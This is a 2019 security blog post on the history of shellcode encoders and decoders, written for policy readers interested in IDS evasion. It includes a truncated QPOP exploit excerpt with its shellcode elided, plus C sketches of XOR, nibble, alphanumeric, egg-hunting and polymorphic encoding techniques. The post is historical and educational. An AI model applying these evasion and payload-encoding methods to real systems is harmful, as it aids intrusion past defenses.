Tuesday, March 12, 2019

The Lost Art of Shellcode Encoder/Decoders


Network intrusion detection systems used to be a thing. But more importantly, stack overflows used to be a thing. And both the attack that is the stack overflow and the defense that is the IDS turned an entire generation of hackers into experts at crafting encoder/decoders, leaving vestigial codepaths, like a coccyx, all throughout Metasploit and CANVAS and Core Impact and other tools from that era.

This post is a walkthrough of the entire problem space, from a historical perspective. If you did not live through this era, or were not involved in information security at a technical level, then this is the only overview you will ever need, assuming you also click all the links and read those papers as well. This is the policy blog, and this post is for policy people who want to get up to speed on the technical background of basic cyber-domain physics, as well as for anyone else interested in the subject: thousands upon thousands of hours of writing shellcode went into this piece.


A "shellcode decoder" takes an arbitrary encoded string, converts it back into its original form, and then executes it.

In modern times you rarely use a shellcode decoder, since most readable places in memory are not executable, so you use a "ROP chain" instead. But it's important to study shellcode decoders, even if just as a student of history, because they point us to some basic physics of how cyber war works.

This simple stack overflow training tool shows how a list of "bad bytes" used to be a very important part of the entire exploitation process (\x00\r\n was a typical minimal set).

Imagine a simpler system, Windows 2000 perhaps, with simpler bugs: a strcpy(stackbuffer, input) or sprintf(stackbuffer, "%s\r\n", input). I'm not going to go over Buffer Overflows 101, as that was 15 years ago, except to say this: the typical overflow had three simple features.

  • Your string was limited in length
  • Your string could have almost all values, but not 0x00
  • Your string would clobber various variables as you went towards the stored EIP, but you didn't want the program to crash when it used those variables
It's also true that x86 used to be a niche architecture, for specialists. Real hackers were so multi-lingual they often knew more platforms than they had pants. SPARC, MIPS, Alpha, x86, PA-RISC, POWER, etc. And on top of these chips, a multitude of OS types. SunOS was not Solaris was not Irix was not Tru64 was not HP-UX. But they all ran the same buggy software so you would often see exploits that had code for all major platforms in one file.

Zero-Free Shellcode

The first thing everyone did was write a shellcode that contained no zeros. Then you would have to do that for every platform, optimized for size. Then you would do that again, but also avoiding \r\n. Then again for removing spaces and plus signs. Then again, but instead of running /bin/sh and assuming stdin and stdout were useful, it would connect back to a listening host and proxy your connection. 

Clearly this gets old fast. But one shellcode per exploit had a side benefit: Everyone's was slightly different. My shellcode did not look like Duke_'s or Str's. And that made life harder for the primitive IDSs prowling the primordial cyber oceans, like sea scorpions with limited perception and infinite hunger. 

You can see this fascinating display of early-lifeform diversity on many websites, such as here.

This website doesn't say which badbytes are avoided by each shellcode for some reason.

This was an era before giant botnets and router hackers made it so your exploits were never more than two hops away from your target. So while you COULD play network games to avoid an IDS (say, send five different fragments, some of which you knew would be dropped by your target's network stack but not by the IDS), it was hard to predict how a network stack a full second of ping time away from you would handle these kinds of shenanigans. So it was best to just not be the string they were looking for.

Early Decoders

Most people very quickly wrote a FOR loop in assembly that, when executed, XORed the string behind it with a fixed key. Of course, this sucks in many ways.

First of all, picking the byte you are going to XOR an unknown string with means that sometimes there is NO byte that avoids producing a 0x00 somewhere in the resulting string. For small hand-crafted exploits this was no problem: you picked an encoder, XOR byte, and payload string, and if they did not meet your needs, you adjusted them manually. (CANVAS used an ADD instead of an XOR for this reason.)
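The key-selection problem is easy to see in a few lines of C. This is a sketch of mine, not code from any of the era's tools: it brute-forces a single-byte XOR key against a hypothetical \x00\r\n badchar set, and the -1 case is exactly the "no possible byte" failure described above (an ADD/SUB encoder simply gives you a second, differently-shaped keyspace to fall back on when it happens).

```c
#include <stddef.h>

/* Bad bytes for a hypothetical target: NUL, CR, LF. */
static int is_bad(unsigned char c)
{
    return c == 0x00 || c == 0x0D || c == 0x0A;
}

/* Brute-force a single-byte XOR key that encodes the payload with no
 * bad bytes.  Returns the key, or -1 when no key exists -- e.g. any
 * payload containing all 256 byte values XORs to 0x00 under every
 * possible key. */
static int find_xor_key(const unsigned char *payload, size_t len)
{
    for (int key = 1; key < 256; key++) {
        size_t i;
        for (i = 0; i < len; i++)
            if (is_bad((unsigned char)(payload[i] ^ key)))
                break;
        if (i == len)
            return key;       /* every encoded byte is clean */
    }
    return -1;                /* no single-byte key works */
}
```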

As a prescient case study, let's look at Stran9er's BSDi shellcode:

/*
 * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
 * and BSDi 2.1
 * 24-Jun-1998 by stran9er
 * Based:
 *         FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
 *         x86 decode.bin/encode.c by Solar Designer.
 * Disclaimer:
 *         this demonstration code is for educational purposes only! DO NOT USE!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ESP 0xefbfd480
#define BMW 750

main(int argc, char **argv)
{
   int i,t,offset = 500;
   char buf[1012];
   char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
   char decode_x86[] = /* decoder string elided in this excerpt */;
   char shellcode_BSDi[] = /* shellcode string elided in this excerpt */;

   fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
   if (argc>1) offset = atoi(argv[1]);
   fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
   fprintf (stderr," esp+offset=0x%x\n\n",ESP+offset);
   for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
   for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
   for(t=0;t < sizeof(shellcode_BSDi);t++) {
    buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
    buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
   }
   buf[1008] = ((ESP+offset) & 0xff000000) >> 24;
   buf[1007] = ((ESP+offset) & 0x00ff0000) >> 16;
   buf[1006] = ((ESP+offset) & 0x0000ff00) >> 8;
   buf[1005] = ((ESP+offset) & 0x000000ff);
/* -- CONFIDENTIAL -- */

This code had some interesting features: it randomized the NOP sled, avoiding 0x90 entirely, and it used a nibble encoder to bypass Qpop's bad bytes. In shellcode used in real exploits (as opposed to academic papers) you are optimizing not for length(arbitrary shellcode), but for length(decoder) + length(encoded specific shellcode) + the difficulty of manually writing the decoder. This made nibble encoding (e.g., 0xFE -> 0x4F 0x4E) a popular solution even though it doubled the size of your shellcode.
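The encode loop in the exploit above maps each payload byte to a (remainder, quotient) pair in base 0x21, offset into the printable range starting at 0x5D. Here is the same arithmetic in both directions; the decode function is my reconstruction of what the decoder stub computes, not code lifted from the exploit:

```c
/* Encode one byte into two bytes, exactly as in the exploit above:
 * remainder first, quotient second, both offset by 0x5D. */
static void nibble_encode(unsigned char b, unsigned char out[2])
{
    out[0] = b % 0x21 + 0x5D;   /* 0x5D..0x7D */
    out[1] = b / 0x21 + 0x5D;   /* 0x5D..0x64 (255/0x21 == 7) */
}

/* Invert it: quotient * 0x21 + remainder. */
static unsigned char nibble_decode(const unsigned char in[2])
{
    return (unsigned char)((in[1] - 0x5D) * 0x21 + (in[0] - 0x5D));
}
```

Every output byte lands in ']'..'}' (0x5D-0x7D): no NUL, no \r\n, no space, and, since that range contains no uppercase letters, the encoded string also passes through tolower() unchanged.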

One reason this kind of shellcode decoder was popular is that you often had to pass through a tolower() or toupper() function call on the way to your overflow as back then most overflows were still in strings passed around via text protocols.


This brings us to the Windows platform, which was notable for a few major reasons:

  • Shellcode needed to be larger to accommodate finding functions by their hash in the PE header, so expanding it became more dangerous
  • Unicode became a thing
  • You rarely got to attack a service more than once (Unix services often restarted after they crashed, but Windows services never did)

Chris Anley was the first to find some ways around the Unicode problem, which he called "Venetian" decoding. Typical UTF-16 conversion would do a horrible thing to your shellcode: it would insert a zero as every second byte.

To quote from his paper directly.

Why yes, Chris, that IS a complication.
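The complication is easy to reproduce. A toy model of the ANSI-to-Unicode widening (on a real Windows target the path is MultiByteToWideChar and codepages; this only covers plain ASCII) shows the inserted zeros:

```c
#include <stddef.h>

/* Model of what the ANSI->Unicode widening does to a payload: each
 * input byte becomes a two-byte UTF-16LE code unit, so a 0x00 lands
 * after every byte of your shellcode.  These are the zeros that
 * Venetian shellcode has to plan its instructions around. */
static size_t widen(const unsigned char *in, size_t len, unsigned char *out)
{
    for (size_t i = 0; i < len; i++) {
        out[2 * i]     = in[i];
        out[2 * i + 1] = 0x00;
    }
    return 2 * len;
}
```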

Other hackers, myself and Phenoelit included, then furthered this work by formalizing it and generalizing it to particular exploits we were working on in the 2003 era. However, the key realization was essentially that when you started your exploit, there were some things you knew, including the values of registers and the contents of particular pieces of memory, that made some of these seemingly intractable problems perfectly doable.

AlphaNumeric shellcodes

This brings us to another shellcode innovation (2001) in which various people attacked the heavily restricted filter on x86: isalnum(). What you should be internalizing by now, if you've never written a shellcode decoder, is that each decoder attacked a specific mathematical transformation function of basically arbitrary complexity. The original Phrack article is here, but the code to generate the shellcodes is here. Skylined is still quite active and you can see his INFILTRATE slides here.
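To make the constraint concrete, here is a filter in the isalnum() spirit, plus a few single-byte x86 opcodes that happen to be alphanumeric ASCII (the example bytes are mine, not anyone's published shellcode). Enough of the instruction set falls in 0x30-0x39, 0x41-0x5A, and 0x61-0x7A (inc/dec, push/pop, push-immediate, the short conditional jumps, xor al,imm8) that a full decoder can be built from it:

```c
#include <ctype.h>
#include <stddef.h>

/* The kind of filter these shellcodes attacked: every byte must be
 * alphanumeric ASCII or the payload dies before it runs. */
static int survives_isalnum(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (!isalnum(buf[i]))
            return 0;
    return 1;
}

/* A few x86 instructions whose encodings are pure alnum ("PXAI4AjB"): */
static const unsigned char stub[] = {
    0x50,       /* 'P'  push eax     */
    0x58,       /* 'X'  pop  eax     */
    0x41,       /* 'A'  inc  ecx     */
    0x49,       /* 'I'  dec  ecx     */
    0x34, 0x41, /* '4A' xor  al,0x41 */
    0x6A, 0x42, /* 'jB' push 0x42    */
};
```

Note that 0x90 (NOP) fails the filter, which is one reason alnum sleds were built from instructions like inc/dec instead.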

Another common shellcode of the time was the eggsearch shellcode, particularly on Windows, where you would need a tiny shellcode that could find a much larger, more complicated shellcode somewhere else in memory. This was quite difficult in practice, as your stage-2 shellcode was almost certainly in many different places in RAM, corrupted in different ways. Likewise, searching all of RAM requires handling the exceptions you get when accessing memory that is not mapped. On Windows you had the ability to use the built-in exception handling, but every other platform required a system call that could be used as an oracle to find out whether a page was accessible. The other major issue was timing: going through all of RAM takes a long time on older systems, and your connection might time out, triggering cleanups and unfortunate crashes. On systems which stored most of your data in writable but not executable pages, you also wanted to mprotect() your stage 2 back to something which could execute before jumping to it, which added size and complexity. In writing shellcode, things that seem simple can often be quite complicated.
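A toy version of that oracle pattern, with Linux's mincore() standing in for "a system call that tells you whether a page is mapped" (a real egghunter was a dozen bytes of assembly; on Unix people often abused something like access(), which cheaply returns EFAULT on a bad pointer, and this sketch also ignores eggs straddling page boundaries):

```c
#define _DEFAULT_SOURCE
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Toy egg-hunter: walk a page-aligned range, using mincore() as the
 * "is this page even mapped?" oracle instead of eating a SIGSEGV,
 * then memcmp each offset for the egg.  Real hunters repeated a
 * 4-byte tag twice (e.g. "w00tw00t") so a hit could not be the
 * hunter finding its own search string. */
static void *find_egg(unsigned char *lo, unsigned char *hi, const char *egg)
{
    long pg = sysconf(_SC_PAGESIZE);
    size_t elen = strlen(egg);
    unsigned char vec;

    for (unsigned char *p = lo; p + pg <= hi; p += pg) {
        if (mincore(p, (size_t)pg, &vec) != 0)
            continue;                        /* unmapped: skip the page */
        for (long i = 0; i + (long)elen <= pg; i++)
            if (memcmp(p + i, egg, elen) == 0)
                return p + i + elen;         /* stage 2 follows the egg */
    }
    return NULL;
}
```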

RISC Shellcode

So far this sojourn through history has ignored a key aspect of platform diversity: RISC systems. Early RISC systems each had some large subset of the following:

  • branch delay slots
  • code vs data caches
  • aligned instructions
  • register windows
  • huge amounts of registers
  • hardware support for Non-Execute memory pages
  • Per-Program system call numbers (lol!)

Sometimes the stack would go backwards (HP-UX) or do other silly things as well (e.g., Irix systems often ran on one of many possible chips, each of which was quite different!). There were many more features that Unix hackers dealt with long before Windows or Linux hackers had to.

LSD-PL TTDBSERVERD exploit shellcode for Solaris.
Recently, Horizon and I were reminiscing about the bn,a bn,a which characterized early Solaris SPARC shellcode. The goal of the first set of instructions of almost ANY shellcode is to FIND OUT WHERE IN MEMORY YOU ARE. This is difficult on most platforms, as you cannot just:

 mov $eip, $reg  

Instead, you engaged in some tricks, usually using CALL (which typically would PUSH the current address onto the stack or store it in some utility register). In SPARC's case, the branch delay slot meant that the bn,a instruction would "branch never, and annul (skip over) the next instruction". So the first three instructions in the shellcode above would load the current location into a register by calling backwards and then skipping back over the call instruction. You'll notice bn,a has \x20 (space) as its first byte, which meant a lot of shellcode instead used a slightly longer variant that set a flag with an arithmetic instruction and then used "branch above" or "branch below", depending on the particular bad bytes in place.
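On x86 the equivalent find-yourself trick was the jmp/call/pop stub. The bytes below are the canonical pattern (the exact offsets are my construction); note that because the CALL points backwards, its rel32 is negative and encodes as 0xF8 0xFF 0xFF 0xFF, whereas a forward CALL would embed exactly the 0x00 bytes you are trying to avoid:

```c
/* Classic x86 "GetPC" via jmp/call/pop.  The CALL pushes the address
 * of the byte after itself -- which is the payload -- and the POP
 * catches it in ESI. */
static const unsigned char getpc[] = {
    0xEB, 0x03,                    /* jmp  +3   ; hop to the CALL     */
    0x5E,                          /* pop  esi  ; esi = payload addr  */
    0xEB, 0x05,                    /* jmp  +5   ; hop to the payload  */
    0xE8, 0xF8, 0xFF, 0xFF, 0xFF,  /* call -8   ; back to the POP     */
    /* payload bytes would start here */
};
```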

On x86 you could also do funny tricks with the floating point or other extended functions, for example this code by Noir:

"Still not perfect though"


Many shellcode decoders on RISC had a simple problem: when you change the data of a page, that change might not be reflected in the CPU's instruction cache. This led to extremely difficult-to-debug situations where your shellcode would crash at a RANDOM location in code that seemed perfectly good. And when you attached to it with a debugger and stepped through it, it would work every time.

The code and data caches get synchronized when a context switch happens, or by a special "flush" instruction, which never ever works, for some unknown reason. Context switches happen whenever the CPU decides to execute another thread, which means you could sometimes make your exploit more reliable by placing the CPU under load. This, of course, also interacted with "register windows", which meant that your use of the stack could be entirely different depending on the load of the processor, leaving more than one possible offset in your attack string for the stored EIP. RISC IS NEAT, RIGHT?

There were two main reliable ways to handle code vs. data cache coherency problems:

  • Include an infinite loop at the end of your shellcode, and modify it to a NOP with your decoder. When the loop is cleared, you know the cache is flushed!
  • Fork(), or call another system call that you know will change contexts and flush the cache.
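The first trick, sketched with SPARC encodings (a conceptual illustration of mine, not shellcode from a real exploit): the payload ends in a branch-to-self, and the decoder's final store rewrites that word to a NOP, so escaping the spin loop doubles as proof that the I-cache has seen your writes.

```c
#include <stdint.h>

/* SPARC: "ba ." with disp22 == 0 branches to itself, i.e. spins
 * forever.  The decoder's very last store rewrites it to a NOP
 * (sethi 0, %g0).  Execution can only fall past this word once the
 * instruction cache has picked up the new value. */
static uint32_t shellcode_tail = 0x10800000u;  /* ba .  -- spin here */

static void decoder_last_store(void)
{
    shellcode_tail = 0x01000000u;              /* nop (sethi 0, %g0) */
}
```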


In 1999, K2 (Shane Macaulay) wrote a polymorphic shellcode library called ADMmutate, which ended up being the top tier of shellcode operational-security tools. The basic theory was that you could mutate almost all elements of your shellcode and still have it work reliably. He explains the basic technique thusly:

So what do we have now? We have encoded shellcode, and substituted NOP's, all we need is to place our decoder into the code. What we have to be careful about is to produce code that resists signature analysis. It would not be cool if the IDS vendor could simply detect our decoder. 
Some techniques that are used here are multiple code paths, non operational pad instructions, out-of-order decoder generation and randomly generated instructions. 
For instance, if we intend to load a register with some known data (our decode key), we can push DATA, pop REGISTER or we can move DATA,REGISTER or CLEAR REGISTER, add DATA,REGISTER, etc... endless possibilities. Each instruction of the decoder can be substituted by any number equivalent instructions, so long as the algorithm is not changed. 
Another technique is non operational padding, to accomplish this, when generating the decoder we ensure that there are some spare CPU registers that are left available for any operation we see fit. For example, on IA32 EAX was selected, as it is optimized to be used with many instructions, and is occasionally the implicit target of an operation. 
This allows us to pad every instruction in our decoder with one of or more JUNKS!!! MUL X EAX, SHR X EAX, TEST EAX,EAX, etc... (X is randomly selected from an array of integers that passed through all shellcode requirements.) 
To further reduce the pattern of the decoder, out-of-order decoders are now supported. This will allow you to specify where in the decoder certain operational instructions may be located.
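K2's substitution idea can be sketched for a single decoder operation, "load the decode key into AL". This is my illustration of the technique, not ADMmutate's code: pick one of several semantically identical x86 encodings and pad with one-byte instructions that only touch flags (safe as long as the decoder never carries flags across them):

```c
#include <stdlib.h>
#include <string.h>

/* Emit "AL = key" as one of three equivalent encodings, padded front
 * and back with flags-only junk.  out must hold at least 6 bytes;
 * srand(seed) is only here to make the sketch reproducible. */
static size_t emit_load_key(unsigned char *out, unsigned char key,
                            unsigned int seed)
{
    static const unsigned char junk[] = { 0x90, 0xF8, 0xF9, 0xF5 };
    /* nop, clc, stc, cmc */
    size_t n = 0;

    srand(seed);
    out[n++] = junk[rand() % 4];
    switch (rand() % 3) {
    case 0:                               /* mov  al, key             */
        out[n++] = 0xB0; out[n++] = key;
        break;
    case 1:                               /* push key ; pop eax       */
        out[n++] = 0x6A; out[n++] = key; out[n++] = 0x58;
        break;
    default:                              /* xor eax,eax ; add al,key */
        out[n++] = 0x31; out[n++] = 0xC0;
        out[n++] = 0x04; out[n++] = key;
        break;
    }
    out[n++] = junk[rand() % 4];
    return n;
}
```

Scale this up to every instruction of the decoder, and a byte-string signature for "the decoder" stops existing.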

What this did when it went public was force every IDS vendor to either acknowledge failure, move to protocol parsing instead of signature detection, or emulate x86 (and other) architectures in order to draw heuristics on the likely "executability" of strings.

None of these is a good option, and most of them are extremely RAM and CPU intensive. Yet network IDS systems are supposed to work "at scale". However, even today, most IDSs are still globbing byte streams like it was 1998.

Mutated System Call Numbers

AIX had a neat feature where the system call numbers were not static, which was especially a problem for remote exploits, where fingerprinting was difficult. There was a decent paper from San (of XFocus) on this, where he used dtspcd to get a remote system's exact version, and another more recent one, although the better way is probably to build an XCOFF-parser shellcode from the "table of contents" pointer and call libc functions directly, much as you would do on Windows. You'll note there are far fewer public buffer overflow exploits for AIX than you would expect, if you do a survey, even for locals.


What historical shellcode DID once it ran is the topic of another blogpost, but for now it is easiest, from a policy perspective, to look at this entire topic as a question of whether or not you have to store state, and if so, where. This concept drives down to the deepest levels of what technology will work on both defense and offense, as it is a fundamental tradeoff, like matter vs. energy, or Emacs vs. VI. Hopefully you got something out of this more technical post! If you liked it, let us know and we'll continue the series with a section on system call proxying.


  1. Ah man, what a neta post :D
    Obligatory CCS 2009 English shellcode https://www.cs.jhu.edu/~sam/ccs243-mason.pdf
    and 2016 methodology to automatically turn arbitrary ARMv8 programs into alphanumeric executable polymorphic shellcodes https://arxiv.org/pdf/1608.03415.pdf

    1. I on purpose did not include the English one because while "cool" it did not get used in any exploits I know about. Blowing up the shellcode size is not a winning strategy in real life! :)
